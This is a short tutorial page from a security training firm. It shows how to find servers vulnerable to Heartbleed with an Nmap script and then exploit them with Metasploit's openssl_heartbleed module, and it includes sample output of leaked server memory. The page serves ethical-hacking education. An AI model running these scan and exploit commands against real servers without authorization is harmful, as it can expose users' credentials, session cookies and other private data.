Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).
HEARTBLEED
TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.
Heartbleed was one of the exploits that was so impactful to so many systems that it sent waves through the IT industry.
Heartbleed is very simple to exploit and can be very deadly.
The easiest way to find vulnerable systems is with Nmap. Run the following command on your Linux system:
# nmap -p 443 --script ssl-heartbleed <target(s)>
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
<snip>
As you can see, this has found a vulnerable system.
Next, to exploit this, launch Metasploit. Remember to start the database service!
# service postgresql start
/opt/metasploit/app# ./msfconsole
Once launched, use the following commands to use the Heartbleed module:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(\(\(\(\(openssl_heartbleed) > set VERBOSE TRUE
VERBOSE=> TRUE
msf auxiliary(\(\(\(\(openssl_heartbleed) > set RHOSTS 192.168.1.1
RHOSTS=> 192.168.1.1
msf auxiliary(\(\(\(\(openssl_heartbleed) > run
[*] 192.168.1.1:443
Sending Client Hello...
[*] 192.168.1.1:443
Sending Heartbeat...
[*] 192.168.1.1:443
Heartbeat response, checking if there is data leaked...
[+] 192.168.1.1:443
Heartbeat response with leak
[*] 192.168.1.1:443
Printable info leaked:
@SKO0'94wiW*G):[f"!98532ED/Ait/537.36 (KHTML, like Gecko)
Chrome/34.0.1847.116 Safari/537.36Accept
<snip>
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
You will notice here that Metasploit communicated with the server and was able to pull random data from the server’s memory. The important thing to note here is that it pulls random data from memory. There is no guarantee that you will find account credentials, session cookie data or critical data every time you run this, however, the danger is that it could display sensitive data.